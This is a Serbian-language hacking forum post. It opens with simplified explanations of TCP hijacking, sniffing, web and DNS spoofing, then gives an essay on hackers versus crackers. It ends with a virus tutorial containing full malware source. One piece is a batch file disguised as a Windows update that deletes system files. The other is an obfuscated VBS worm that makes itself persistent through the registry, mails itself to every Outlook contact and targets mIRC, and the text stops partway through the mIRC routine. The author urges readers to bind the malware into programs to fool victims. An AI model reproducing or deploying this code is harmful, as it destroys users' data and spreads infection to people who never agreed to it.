HackM@ster

Vidim da se puno zanimate za hakovanje i da ima puno pitanja o tome pa evo da probam da barem malo zadovoljim vasu radoznalost. Na zalost ja ne mogu da vas napravim "instant hakerima" ali mogu da vam ukratko dam pregled najcesce koristenih hakerskih tehnika i da vam dam neku prestavu "kako to oni rade". Zeleo bih da naglasim razliku izmedju hakera - koji provaljuju u compove iz cistog profesionalnog izazova i uzbudjenja i da bi izostravali i odrzavali svoje vestine i znanje (i koji imaju jednu posebnu filozofiju i sub-kulturu-koja uopste nije tako losa …) - i crakera koji imaju zle,kriminalne i destruktivne namere i rade to iz privatnog (finansiskog) interesa ili su placeni i iznamljeni za to. Postoje razne vrste i nivoi hakera zavisno od znaja i iskustva kao i talenta,od script kiddies koji su pokupili ovde onde par trikova do Uber-hakera koji sami prave svoje programe i toolsevei koji su jedno od najopasnih stvorenja na Net-u. Naravno dobro poznavanja Internetovih protokola (TCP/IP,UDP,ICMP, itd …) network arhitektura (Ethetnet,Token Ring,itd …) Operativnih sistema - Posebno UNIX-a na kome je internet zasnovan,Web servera (Apache,IIS …) programiranja (C,C++,Java,HTML,UNIX k-shell, awk, perl itd ..) kriptografskih tehnika i enkriptovanih protokola (PGP,DSA,SSl.S-HTTP itd…) routera, firewallova - gatewaya i jos par tuceta drugih znanja i vestina je jedna od osnova da se postane dobar i priznat haker pa zato ako nase mlade i ambiciozne kolege zaista zele da naprave brilijantu haker karijeru - na poso - ne brinite - prvih 10-ak godina je malo tesko ali posle vec ide nekako… Naravno na Netu je non-stop ciberwar izmedju good en bad guy’s i non-stop se pronalaze nove zastitne i napadacke tehnike i tako story goes on…. Neke od nejcesce koriscenih hakerskih tehnika su: 1. Napad na osnovu pogadjanja seriskog broja TCP/IP paketa koji cirkulisu izmedju servera i clienta na networku. Ovo je najprostiji i najcesci nacin napada.kao sto znate svaki komp na netu ima svoju IP-adresu i jedan serie-broj za svaki IP-paket koji posalje na network. Ova vrsta napada se koristi nacinomm na koji se IP-adrsese dodeljuju Compovima i njihovi TCP/IP paket serijski brojevi. Napad se izvodi u 2 etape: - Dobijanje IP-adrese od servera gledanjem u statusbalk od browsera presretanjem paketa na netweku (sniferima) probanjem adresa po rednim brojevim u odredjenoj IP-subklasi (A,B,C) Ako jedan sistem ima napr. IP-192.0.0.15 to je jedan klase C network (128+64=192bits) sto znaci da moze da ima max 256 Ip-adrese (192.0.0.1-254) tako da on pokusava da pogodi jednu adresu u ovom IP-rangeu i da se predstavi serveru kao klient iz njegovog sopstvenog netwerka (internog). Ako mu to uspe on moze da monitoruje TCP/IP data-stream na networku i posle odredjenog vremena mu moze uspeti da ih na osnovu odredjenog algoritma uspesno predvidi serijske brojeve TCP/IP pakketa izmedju klijeta i servera i da tako preuzme ulogu jednog od klijenata na servervom networku i da ga ubedi da dobija informacije od svog klijenta a ustvari ih dobija sa hakerove machine. Na taj nacin haker moze da monitoruje data stream na networku sto ukljucuje login names, passworde, poverljive podatke itd. Ovo se obicno radi kao priprema napada na server ili na neki drugi server na istom networku. 2. Napadi sa sniferima: TCP-IP paket interception ili aktivno snifanje. Ovo je jedan od najopasnijih oblika napada na jedan server koji je prikljucen na jedan TCP/IP network. U ovom slucaju haker ne pokusava da pogadja IP-adrese vec presrece TCP/IP konekciju izmedju trusted(verovanog) klijenta na networku i servera i primorava server da hakerovu masinu na taj nacin prihvata kao trusted-host. Na taj nacin on simulira IP adresu i seriske brojeve TCP/IP paketa od zrtve kompjutera (to je takozvano IP-mimik (imitiranje)). Posto se on sada prestavlja kao trusted (verovan) host on buy passuje login i password indetifikaciju i moze da prodre do vise obezbedjenih sistema i preuzme kontrolu na njima. Pasivno snifovanje jedan dobro postavljeni nettwork sniffer moze da monitoruje TCP/IP data-stream i da na taj nacin dodje do login namea i passworda od odredjenog racuna (mozda tvog) i da ga kopromituje i koristi kao bazu za provaljivanje super userovog passworda ili nekog drugog racuna sa visim privilegijama. (sto mu obicno pre ili kasnije uspeva). Isto tako ova tehnika se koristi i kao pocetna faza za sledece vrste napada: - Napad aktivnom desinhronizacijom U principu generiradje ogromnog broja ACK-paketa (acknowledgment) zbog prekida veze izmedju klijenta i servera (u stvari mnogo komlikovanije ali ovo ide u teski tehno-blabla a ja necu da vas davim) - Napad ranom desihronizacijom Ovo se zasniva na prekidanju veze izmedju klijenta i servera u jednoj ranoj fazi i zapocinjanju nove veze sa hakerove masine sa (novim) serijskim brojem (a pod identitetom klijenta sa kojim je veza prekinuta) - Napad sa desihronizacijom sa tzv zero-data Kao sto mu ime kaze ovaj napad se zasniva na slanju ogromnog broja tzv. Nula data serveru i klijentu (koje ne sadrze nista) koji nisu vidljivi ali primoravaju server i klijent da prekinu konekciju zbog preopterecenjaTCP/IP konekcije. - Napad na Telnet-sessiju Izvodi se slanjem velikog broja instrukcija specificnih za Telnet (IAC NOP IAC NOP) koji navodi Telnet protokol da pauzira i ceka sto haker koristi da bi preuzeo kontrolu nad konekcijom i "umuva se unutra izmedju". Zastita od ovakvih vrsta napada se sastoji u pazljivom monitorovanj i logovanju svih network aktivnosti i zapisivanju svega neobicnog (na primer neobicno velike procentaze ACK paketa na networku ) kao i u vodjenjem kriptografskih tehnika (Kerber-ove kartice, SSL.S-HTTP, one time passwords, firewalls etc …) Jedna od najopasnijih i najinteresatnijih tehnika na Webu je takozvani Web emulation ili virtual-web gde haker peuzima celu ulogu Web servera i naterava vas da verujete da imate vezu sa hakerovom machinom dok vi verujete da imate vezu sa oderedjenim web-serverom.Na taj nacim on ima potpunu kontrolu nad svim podacima u oba pravca. Na primer vi zelite da napravite konekciju da serverom www.mojabanka.com Ono sto haker radi je da sve linkove i konekcje loaaduje (puni) preko svoje masine dodavanjem na svaki URL-link svoju web-adresu npr www.hakerovamasina.com tako da to postaje http:/hakerovamachina.com/www.mojabanka.com. Na taj nacin svaka transakcija ide preko hakerove machine i daje mu potpunu kontrolu nad svim podacima u oba pravca (full dupleks). Slicna tehnika se koristi i u ovom slucaju samo sto ovo vazi za pojedine linkove sa oderedjene Web-strane (koja moze da bude auteticna) koji bi trebalo da vas odvedu na oderdjenu stranicu a ustvari vas odvode negde sasvim drugde (mada ta stranica izgleda potpuno autenticno). Na primer u HTML programu Web strane (hakovane) stoji ovako nesto: <A HREF=https://www.haker.com/getuserinfo >Click here for a very hot babes !!</A> Gde se nalazi oderedjeni program koji grabi od vas poverljive podatke i slaze ih ih u odredjenu databazu. Zato budite extremno oprezni sa slanjm poverljivih podataka preko Web-a cak i preko kriptovanih i "secure" servera jer ni oni nisu 100% zastita i mogu biti hakovani. Jedna veoma cool tehnika je i DNS-mimik gde se potpuno obilazi firewall na taj nacin sto se prvo kod napadacevog DNS servera (koji je zaduzen da prevodi IP-adresa u imena sajtova) stavlja link na stranu sa istim imenom kao strana zrtve (na primer www.stranazrtve.com) na kojoj se mogu pisati uvredljive stvari o zrtvi postaviti obscene slike ili siriti dezinformacije o zrtvi i propaganda protiv nje, a onda se napda DNS server zrtve (ako nije dobro obezbedjen) gde se menja link za DNS adresu za zrtvinu stranu tako da se povezuje sa DNS serverom napadaca. I Tako ko god na primer ukuca www.serbincafe.com adresira DNS server napadaca koji ga upucuje na napadacevu Web stranu koju on moze urediti kako hoce... Drugi nacim buy pasovanja firewalla je kod organizacija koji koriste dial-up konekcije (paralelno sa LAN) Tako da kompjuter koji se preko modema povezan sa Web-om moze biti napadnit Trjancem ili BO ili necim slicnim a onda biva koriscen kao baza za napad na ostali deo netwerka. Posto napadac ulazi kroj dial-up liniju preko modema on na taj nacim zaobilazi firwall na LAN-u Zeleo bih da naglsim da je ovo samo veoma mali deo koricsenih tehnika i da se svakim danom pronalaze nove metode obezbedjenje i bivaju prevazilazene od hakera i tako u nedogled. Isto tako zeleo bih da naglasim da su ovo VEOMA UPROSCENA objasnjenja jer nisam zelo da vas UGNJAVIM sa teskim teno jezikom jer bi pola od vas umrlo od dosade a sledeca polovina zaspala. Naravno mnogi od vas ce reci OK sve je to lepo ali KAKO(KONKRETNO) se to radi? Pa ostaje vam samo da procitate sve tutoriale koji se nalaze na Outlaw sajtu, i da cekate novije. A naravno, trazite tekstove i na drugim sajtovima.

Pojam haker (eng. hacker) u svom izvornom znacenju opisuje osobu koja se bavi istrazivanjem mogucnosti kompjutera i njihovoj pozitivnoj primeni u svakodnevnom zivotu. Kao sto vidite, ovde se nigde ne spominje da su hakeri zli, da nanose stetu drugima i da su opasni po svet. Hakeri su veoma inteligentne osobe koje istrazuju ono sto je sakriveno u hardveru i softveru. Prostije receno, oni su pronalazaci onoga sto je ili neko sakrio od oci javnosti ili pronalazaci propusta koji su napravljeni greskom! Kod prvog slucaja, kada kazemo 'sakrio' mislimo obicno na programe, mada se i u hardveru moze sakriti dosta toga. Hakeri su po prirodi radoznali ljudi, vole sve da saznaju i ne vole kad je nesto sakriveno od njih. U programima moze dosta toga da se sakrije, narocito u programima ciji je izvorni kod nedostupan javnosti, kakav je ceo Windows i skoro svi programi koji rade pod njim! U takvim programima mogu da se recimo sakriju podprogrami za spijuniranje i programi koji ce samo odabranim ljudima omoguciti pristup zabranjenim resursima, poput vasih hard-diskova. Moze se, dakle, slobodno reci da hakeri ne vole da neko nekome ugrozava privatnost, i zato proucavaju kompjutere, sa zeljom da nadju uljeze u njima. Oni se zalazu za apsolutnu privatnost, sto je uostalom i ljudsko pravo, i svi bi po pravilu trebali da imaju potpunu privatnost. Takodje, ne vole cenzuru, jer to vodi ka jednoumlju, u sta smo se i uverili u proteklih pola veka! Jednom recju, oni su za apsolutnu ravnopravnost, za razotkrivanje svih tajni i za privatnost. Kod drugog slucaja, ljudi puno puta nesvesno prave greske, koje mogu da se iskoriste za ugrozavanje necije privatnosti. Na primer, programer koji je pisao neku Java funkciju u browseru Internet Explorer je zaboravio da napise rutinu za proveru duzine nekog podatka koji ucitana strana definise. I sada, ako neko pronadje propust i namerno napravi stranu koja iskoriscava propust, i ako neko ko ima pomenuti browser ucita tu stranu, IE ce uraditi nesto sto po pravilu ne bi smeo, i na taj nacin osteti posetioca strane. Hakeri traze takve propuste, i ako ih nadju, obavestavaju svet o tome kako bi proizvodjac datog programa ispravio propust i kako bi ljudi preduzeli odredjene korake i na taj nacin zastitili sebe na vreme. Hakeri su misljenja da je bolje da svi znaju za odredjeni propust nego da 'niko' ne zna, zato sto veruju da ipak neko zna za propust, i to koristi da bi spijunirao nekoga. Kada ne bi bilo hakera, danas bi imali browsere, mail, news i icq klijente i servere prepunih bezbednosnih propusta, u proseku bi svaki klijent i server imao oko 5 propusta. Do sada je ukupno pronadjeno vise od 10 000 propusta, i pitanje je da li bas niko ne bi znao za te propuste, narocito ako kazemo da je za neke propuste dokazano da su namerno napravljeni! Pitanje 'zasto namerno' je ovde suvisno, i bas zbog ovih razloga hakeri postoje, vredno rade i otkrivaju nove tajne. Dnevno se u proseku oko 5 novih propusta pronadje! Sa druge strane, hakeri su casni ljudi, posteni, civilizovani, imaju svoju kulturu! Hakerska kultura im ne dopusta da propuste koje otkriju iskoriste u nehumane svrhe. Ako nadju neki propust, oni moraju da obaveste javnost o tome, i ne smeju da ga iskoriste da bi ugrozili neciju privatnost ili napravili stetu bilo kome. Sada jedan savet kako proveriti da li je doticni haker. Prvo ga pitajte da li je do sada naneo nekome stetu koristeci kompjuter. Ako odgovori potvrdno, ili cak pocne da se hvali time - imate posla sa crackerom, jer hakeri ne nanose stetu drugima. Zatim ga pitajte sta je otkrio. Ako kaze 'nista, koristim vec pronadjene propuste' - imate posla sa lamerom, jer je haker samo onaj koji pronadje nesto jedinstveno, sto jos niko nije pronasao. Upravo zbog toga ne moze svako da bude haker, bas kao sto ne moze svako da bude doktor nauka! Crackeri (cita se 'krekeri') su isto pronalazaci, inteligetni ljudi, ali oni, izmedju ostalog, koriste svoje znanje i svoja otkrica da bi nekome naneli stetu. Crackeri pisu viruse i trojance, upadaju na servere i prave stetu na njima (uglavnom tako sto izmene prvu stranu sajta). Lameri su uglavnom klinci, koji nisu nista otkrili i koji takodje nanose stetu drugima, obicno da bi ukrali neku sifru za Internet ili unistili nekome disk koristeci trojance, viruse, pa cak i exploite, koje su crackeri napisali. Oni su gotovani, nauce kako se koriste trojanci i onda prave stetu postenom sveti, misleci da su hakeri. Mnogi od njih ne znaju cak ni kako funkcionise Internet. Cilj im je samo da naprave neku pakost koristeci izum nekog crackera. Onog trenutka kada haker svojim pronalaskom napravi nekome stetu - odmah prestaje da bude haker i postaje cracker! Sasvim je pogresno reci 'hakeri su uhakovali sajt..', kao i 'hakeri su napravili novog crva...'. Hakeri uopste ne nanose stetu, to cine crackeri i lameri. I potpuno je pogresno mrziti hakere. One koje treba mrziti i prezirati su crackeri i lameri! Hakeri su pronalazaci, naucnici, i ne moze se postati haker preko noci. Profesija 'haker' je veoma cista, postena, plemenita i velikim trudom stecena profesija. Na kraju, biti haker znaci biti osoba koja ima ogroman koeficijent inteligencije, osoba koja ceo dan provede za kompjuterom proucavajuci ga, osoba koja to cini da bi zastitila ostale korisnike kompjutera i omogucila im potpunu privatnost, osoba koja svojim pronalascima gura covecanstvo ka napretku, i osoba koja uvek moze da vas pogleda u oci!

Na pocetku tutoriala cu vam objasniti sta su virusi, iako je vecina mozda i okusila nevolje koje virus donosi. Virus je zapravo program ili skripta (java, vbasic...) napravljena da nasteti vasem kompjuteru i koji se moze sam i bez vaseg znanja kopirati na floppy i slati preko e-maila koristeci vase mail adrese u Address Book-u (to su takozvani CRVI ili WORM). Pored toga neki virusi su napravljeni tako da zaraze i ostale fajlove na vasem kompjuteru. Za pravljenje virusa mogu se koristiti svi moguci programski i skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa morate da znate odredjene programske jezike. Zato vam savetujem da, ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da postanete haker morate znati c, c++ i perl programske jezike. U daljem tekstu slede 2 primera *.BAT virusa i *.TXT.VBS virusa koje je veoma jednostavno napraviti i koji ce vam malo pribliziti pojam pravljenja virusa! Naravno, da bi ih razumeli morate znati BATCH i VISUAL BASIC skripting jezike. Ukoliko bi vi zeleli da napravite *.bat virus, evo vam malog primera kako da to uradite. Potrebno je samo da sledeci batch kod iskopirate u notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj virus se predstavlja kao UPDATE za Windows 98, ali je zapravo virus koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i zatim restartovati racunar. Jednom napravljen ovakav virus mozete ubaciti i u neki exe fajl (program ili igricu), a to ce vam najlakse biti uz pomoc nekog bindera (npr. MultiBinder), sem ukoliko znate c/c++ programski jezik... HeHeHe :D (da bi naucili ovaj programski jezik downloadujte tutorial sa naseg sajta, ili potrazite neki na NETu). ######### SECI OVDE ######### @ECHO OFF echo Welcome To Microsoft Windows System Updater Setup echo Installing Components... Please Wait... echo y|del c:\autoexec.bat echo y|del c:\config.sys echo y|del c:\windows\system.ini echo y|del c:\windows\win.ini echo y|del c:\windows\explorer.exe echo Installing is DONE. echo Setup Will Now restart Your Computer... Please Wait... start C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows ######### SECI OVDE ######### VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu. Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje potreban IE), takvi crvi se obicno distribuiraju sa extenzijom '.txt.vba', tako da potencijalna zrtva pomisli da se radi o obicnom tekstu i startuju fajl. Posto je zadnja ekstenzija '.vba', ne startuje se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva postane prava zrtva. Sledeci virus je srpska verzija virusa I_LOVE_YOU, samo sto je mnogo opasniji i mnogo bolji. Ovaj kod ce te takodje iskopirati u notepad, ali snimicete ga kao volim_te.txt.vbs Virus je odlican, sam se kopira i salje putem e-maila ili preko mIRC-a. ######### SECI OVDE ######### 'Virus volim_te.txt.vbs Created By ReNZor. 12/2/2003 Set HFFLUN1U = createobject("scripting.filesystemobject") HQO5518H = HFFLUN1U.getspecialfolder(1) R125B3VC = HQO5518H & "\volim_te.txt.vbs" Set SO2ERHGU = createobject("wscript.shell") SO2ERHGU.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R125B3VC & " %" HFFLUN1U.copyfile wscript.scriptfullname, R125B3VC O8UN6TKP If SO2ERHGU.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\volim_te.txt.vbs\P6OIH928") <> 1 then EU3V0765 End if If SO2ERHGU.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\volim_te.txt.vbs\T7UT8582") <> 1 then EJSL7CBE "" End if Set M79N43AH= HFFLUN1U.opentextfile(wscript.scriptfullname) IC4FESF6 = M79N43AH.readall M79N43AH.close Do if not(HFFLUN1U.fileexists(wscript.scriptfullname)) then set I1JH1J72= HFFLUN1U.createtextfile(wscript.scriptfullname) I1JH1J72.write IC4FESF6 I1JH1J72.close end if UDT5953N = SO2ERHGU.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate") If UDT5953N <> "wscript.exe " & R125B3VC & " %" then SO2ERHGU.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & R125B3VC & " %" end if UDT5953N= "" loop Function EU3V0765() Set GJ7P4911 = CreateObject("Outlook.Application") If GJ7P4911 = "Outlook" Then Set KECO30GA = GJ7P4911.GetNameSpace("MAPI") Set L219C6V2 = KECO30GA.AddressLists For Each H82H7563 In L219C6V2 If H82H7563.AddressEntries.Count <> 0 Then A5II2553 = H82H7563.AddressEntries.Count For S8JO7233 = 1 To A5II2553 Set K7623MOJ = GJ7P4911.CreateItem(0) Set H541TU1Q = H82H7563.AddressEntries(S8JO7233) K7623MOJ.To = H541TU1Q.Address K7623MOJ.Subject = "cao" K7623MOJ.Body = "Cao, " & vbcrlf & "nadam se da ces ovo procitati i" & vbcrlf & "da ces razumeti..." & vbcrlf & "" execute "set ISHK15M5 =K7623MOJ." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115) UVSBA4Q2 = R125B3VC K7623MOJ.DeleteAfterSubmit = True ISHK15M5.Add UVSBA4Q2 If K7623MOJ.To <> "" Then K7623MOJ.Send End If Next End If Next End If End function Function EJSL7CBE(N46SM3R1) If N46SM3R1 <> "" Then RH5KFA0D = SO2ERHGU.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If HFFLUN1U.fileexists("c:\mirc\mirc.ini") Then N46SM3R1 = "c:\mirc" ElseIf HFFLUN1U.fileexists("c:\mirc32\mirc.ini") Then N46SM3R1 = "c:\mirc32" ElseIf HFFLUN1U.fileexists(RH5KFA0D & "\mirc\mirc.ini") Then N46SM3R1 = RH5KFA0D & "\mirc" ElseIf HFFLUN1U.fileexists(RH5KFA0D & "\mirc32\mirc.ini") Then N46SM3R1 = RH5KFA0D & "\mirc" Else N46SM3R1 = "" End If End If If N46SM3R1 <> "" Then Set C1JLJ66F = HFFLUN1U.CreateTextFile(N46SM3R1 & "\script.ini", True) C1JLJ66F = "

View Full Version: HackM@ster